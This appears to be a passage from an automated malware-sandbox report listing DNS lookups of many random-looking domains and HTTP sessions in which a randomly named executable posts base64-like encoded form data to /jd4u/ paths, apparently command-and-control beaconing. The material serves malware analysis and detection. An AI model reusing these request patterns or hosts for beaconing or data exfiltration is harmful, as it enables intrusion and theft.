Jun 13, 2024 11:04:09.777281046 CEST	1.1.1.1	192.168.2.5	0x3937	No error (0)	td-ccm-neg-87-45.wixdns.net		34.149.87.45	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:04:23.465847969 CEST	1.1.1.1	192.168.2.5	0x9e40	No error (0)	www.binpvae.lol		116.213.43.190	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:04:44.659131050 CEST	1.1.1.1	192.168.2.5	0x3cbb	No error (0)	www.duzane.com		102.222.124.13	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:04:59.083019018 CEST	1.1.1.1	192.168.2.5	0x3206	No error (0)	www.mg55aa.xyz		35.241.34.216	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:05:12.864190102 CEST	1.1.1.1	192.168.2.5	0x6fa6	No error (0)	www.ie8mce.website		176.113.70.180	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:05:26.946825981 CEST	1.1.1.1	192.168.2.5	0x9834	No error (0)	www.shrongcen.com		123.58.214.101	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:05:41.487768888 CEST	1.1.1.1	192.168.2.5	0xbaac	No error (0)	www.skyinftech.com	skyinftech.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 13, 2024 11:05:41.487768888 CEST	1.1.1.1	192.168.2.5	0xbaac	No error (0)	skyinftech.com		103.138.88.32	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:05:56.001605988 CEST	1.1.1.1	192.168.2.5	0x9bf0	No error (0)	www.chowzen.top		162.0.213.72	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:06:09.508116007 CEST	1.1.1.1	192.168.2.5	0x40b5	No error (0)	www.lecoinsa.net		217.116.0.191	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:06:23.722023010 CEST	1.1.1.1	192.168.2.5	0x3303	No error (0)	www.zhuan-tou.com		103.120.80.111	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:06:37.553472042 CEST	1.1.1.1	192.168.2.5	0x1f2b	No error (0)	www.kacotae.com		64.226.69.42	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:06:51.321412086 CEST	1.1.1.1	192.168.2.5	0x3a3e	No error (0)	www.webuyfontana.com	webuyfontana.com		CNAME (Canonical name)	IN (0x0001)	false
Jun 13, 2024 11:06:51.321412086 CEST	1.1.1.1	192.168.2.5	0x3a3e	No error (0)	webuyfontana.com		15.197.204.56	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:07:04.972917080 CEST	1.1.1.1	192.168.2.5	0x5050	No error (0)	www.lunareafurniture.com		104.21.14.186	A (IP address)	IN (0x0001)	false
Jun 13, 2024 11:07:04.972917080 CEST	1.1.1.1	192.168.2.5	0x5050	No error (0)	www.lunareafurniture.com		172.67.160.38	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.am1-728585.com

www.witoharmuth.com

www.magnoliahairandco.com

www.binpvae.lol

www.duzane.com

www.mg55aa.xyz

www.ie8mce.website

www.shrongcen.com

www.skyinftech.com

www.chowzen.top

www.lecoinsa.net

www.zhuan-tou.com

www.kacotae.com

www.webuyfontana.com

www.lunareafurniture.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49710	123.58.214.101	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:03:39.607364893 CEST	453	OUT	GET /9yv1/?fD=JDOq8sdeR7GiqYjlH1+Kl93ySCj4A7pMbAnb3QvwXz09Z+TZO8TEz9zOGDteEA1FR7OBJaMhM3F8CenkIFufyI1/tJZv1FUS2g72fmKkU9bvVaC3pZ4GqQYdgiVFYuGLpQ==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.am1-728585.com Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 13, 2024 11:03:40.565907001 CEST	318	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 13 Jun 2024 09:03:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 153 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	85.13.162.190	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:03:55.870724916 CEST	718	OUT	POST /jd4u/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.witoharmuth.com Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.witoharmuth.com Referer: http://www.witoharmuth.com/jd4u/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 69 62 55 76 61 56 39 4f 66 68 52 48 76 38 70 46 7a 4e 68 69 45 36 6f 6a 2f 55 6b 39 54 74 52 55 6e 45 72 41 59 4a 41 51 6d 32 43 2f 6f 30 47 72 54 50 71 4c 65 52 75 32 46 38 46 32 57 45 38 6f 30 49 55 52 6c 6b 6c 39 39 5a 5a 36 37 5a 6d 70 32 46 70 6f 2f 6b 71 58 79 72 6e 6d 33 4b 72 56 37 32 52 39 6a 6d 76 64 37 64 4e 4b 59 30 54 52 58 62 4d 34 78 58 34 77 34 63 54 51 48 56 5a 48 42 2b 54 54 4a 51 7a 41 71 37 4c 59 72 4e 6e 35 45 5a 4e 41 45 56 53 74 33 6a 6b 64 7a 46 64 4a 42 6c 63 45 58 69 32 44 31 7a 49 70 4b 52 69 6a 4a 42 59 77 46 4a 37 6e 66 53 45 55 44 47 43 50 52 41 75 37 41 6b 73 3d Data Ascii: fD=ibUvaV9OfhRHv8pFzNhiE6oj/Uk9TtRUnErAYJAQm2C/o0GrTPqLeRu2F8F2WE8o0IURlkl99ZZ67Zmp2Fpo/kqXyrnm3KrV72R9jmvd7dNKY0TRXbM4xX4w4cTQHVZHB+TTJQzAq7LYrNn5EZNAEVSt3jkdzFdJBlcEXi2D1zIpKRijJBYwFJ7nfSEUDGCPRAu7Aks=
Jun 13, 2024 11:03:56.794821024 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 13 Jun 2024 09:03:56 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: User-Agent Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 [TRUNCATED] Data Ascii: 2000<!DOCTYPE html><html lang="de-DE"><head><meta charset='UTF-8'><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Seite nicht gefunden – witoharmuth.de</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//www.witoharmuth.de' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de » Feed" href="https://www.witoharmuth.de/feed/" /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de » Kommentar-Feed" href="https://www.witoharmuth.de/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","sv
Jun 13, 2024 11:03:56.794871092 CEST	1236	IN	Data Raw: 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 Data Ascii: gUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.witoharmuth.de\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.4"}};/! This file is auto-generated /!function(i,n){var o,
Jun 13, 2024 11:03:56.794909000 CEST	1236	IN	Data Raw: 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 Data Ascii: n f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});r
Jun 13, 2024 11:03:56.794943094 CEST	1236	IN	Data Raw: 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 Data Ascii: ){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingE
Jun 13, 2024 11:03:56.794977903 CEST	1236	IN	Data Raw: 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f Data Ascii: css' type='text/css'>/! This file is auto-generated /.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-
Jun 13, 2024 11:03:56.795011997 CEST	1060	IN	Data Raw: 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d Data Ascii: adient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-
Jun 13, 2024 11:03:56.795046091 CEST	1236	IN	Data Raw: 32 34 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65 Data Ascii: 245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,11
Jun 13, 2024 11:03:56.795078993 CEST	1236	IN	Data Raw: 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 Data Ascii: layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-c2000olumns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid)
Jun 13, 2024 11:03:56.795113087 CEST	1236	IN	Data Raw: 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 Data Ascii: color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-whi
Jun 13, 2024 11:03:56.795150042 CEST	1236	IN	Data Raw: 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 61 63 Data Ascii: lor{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gr
Jun 13, 2024 11:03:56.800148964 CEST	1236	IN	Data Raw: 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 Data Ascii: ple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	85.13.162.190	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:03:58.401470900 CEST	738	OUT	POST /jd4u/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.witoharmuth.com Content-Length: 223 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.witoharmuth.com Referer: http://www.witoharmuth.com/jd4u/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 69 62 55 76 61 56 39 4f 66 68 52 48 75 64 35 46 2f 4b 31 69 54 4b 6f 67 6a 45 6b 39 49 64 52 51 6e 45 6e 41 59 4d 34 41 6c 45 6d 2f 6f 57 4f 72 53 4f 71 4c 66 52 75 32 64 4d 46 7a 62 6b 39 46 30 49 5a 69 6c 6c 4a 39 39 5a 6c 36 37 62 75 70 33 79 64 72 2b 30 71 56 70 62 6e 6b 71 61 72 56 37 32 52 39 6a 6d 54 6e 37 65 39 4b 59 6c 6a 52 51 4f 77 35 74 6e 34 7a 39 73 54 51 44 56 59 41 42 2b 54 78 4a 51 44 75 71 2b 48 59 72 50 2f 35 44 4c 31 44 4f 56 54 6d 35 44 6c 7a 39 77 77 54 4d 44 41 2b 4b 42 48 53 6e 41 30 33 50 6e 50 4a 54 6a 51 59 57 70 58 66 50 42 4d 6a 53 32 6a 6d 4c 6a 2b 4c 65 7a 37 74 6d 78 46 4a 42 77 37 41 56 55 4b 36 53 6c 57 48 62 4e 50 51 Data Ascii: fD=ibUvaV9OfhRHud5F/K1iTKogjEk9IdRQnEnAYM4AlEm/oWOrSOqLfRu2dMFzbk9F0IZillJ99Zl67bup3ydr+0qVpbnkqarV72R9jmTn7e9KYljRQOw5tn4z9sTQDVYAB+TxJQDuq+HYrP/5DL1DOVTm5Dlz9wwTMDA+KBHSnA03PnPJTjQYWpXfPBMjS2jmLj+Lez7tmxFJBw7AVUK6SlWHbNPQ
Jun 13, 2024 11:03:59.375355005 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 13 Jun 2024 09:03:59 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.witoharmuth.de/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: User-Agent Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 55 54 46 2d 38 27 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 77 69 74 6f 68 61 72 6d 75 74 68 2e 64 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 [TRUNCATED] Data Ascii: 2000<!DOCTYPE html><html lang="de-DE"><head><meta charset='UTF-8'><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Seite nicht gefunden – witoharmuth.de</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//www.witoharmuth.de' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de » Feed" href="https://www.witoharmuth.de/feed/" /><link rel="alternate" type="application/rss+xml" title="witoharmuth.de » Kommentar-Feed" href="https://www.witoharmuth.de/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","sv
Jun 13, 2024 11:03:59.375413895 CEST	212	IN	Data Raw: 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 Data Ascii: gUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.witoharmuth.de\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.4"}};/*! This file is auto-gen
Jun 13, 2024 11:03:59.375449896 CEST	1236	IN	Data Raw: 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 Data Ascii: erated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,
Jun 13, 2024 11:03:59.375485897 CEST	1236	IN	Data Raw: 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 28 61 2c 65 2c 6e 29 7d 29 2c 6f 7d 66 75 6e 63 74 Data Ascii: ",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.
Jun 13, 2024 11:03:59.375519037 CEST	1236	IN	Data Raw: 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 Data Ascii: ceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var
Jun 13, 2024 11:03:59.375554085 CEST	636	IN	Data Raw: 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 Data Ascii: m + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray
Jun 13, 2024 11:03:59.375586987 CEST	1236	IN	Data Raw: 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f Data Ascii: d-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--color--accent: #e91e63;--wp--preset--color--background-color: #1e73be;--wp--preset--color--header-gradient: #a81d84;--wp--preset--gradient--vivid-cyan-blue-to-vivid-
Jun 13, 2024 11:03:59.375623941 CEST	1236	IN	Data Raw: 25 2c 72 67 62 28 31 30 37 2c 30 2c 36 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 Data Ascii: %,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50
Jun 13, 2024 11:03:59.375674009 CEST	1236	IN	Data Raw: 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 7b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 7d 62 6f 64 79 20 2e 69 73 2d Data Ascii: }:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > {margin: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > {margin: 0;}:whe
Jun 13, 2024 11:03:59.375713110 CEST	1236	IN	Data Raw: 79 61 6e 2d 62 6c 75 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 Data Ascii: yan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important
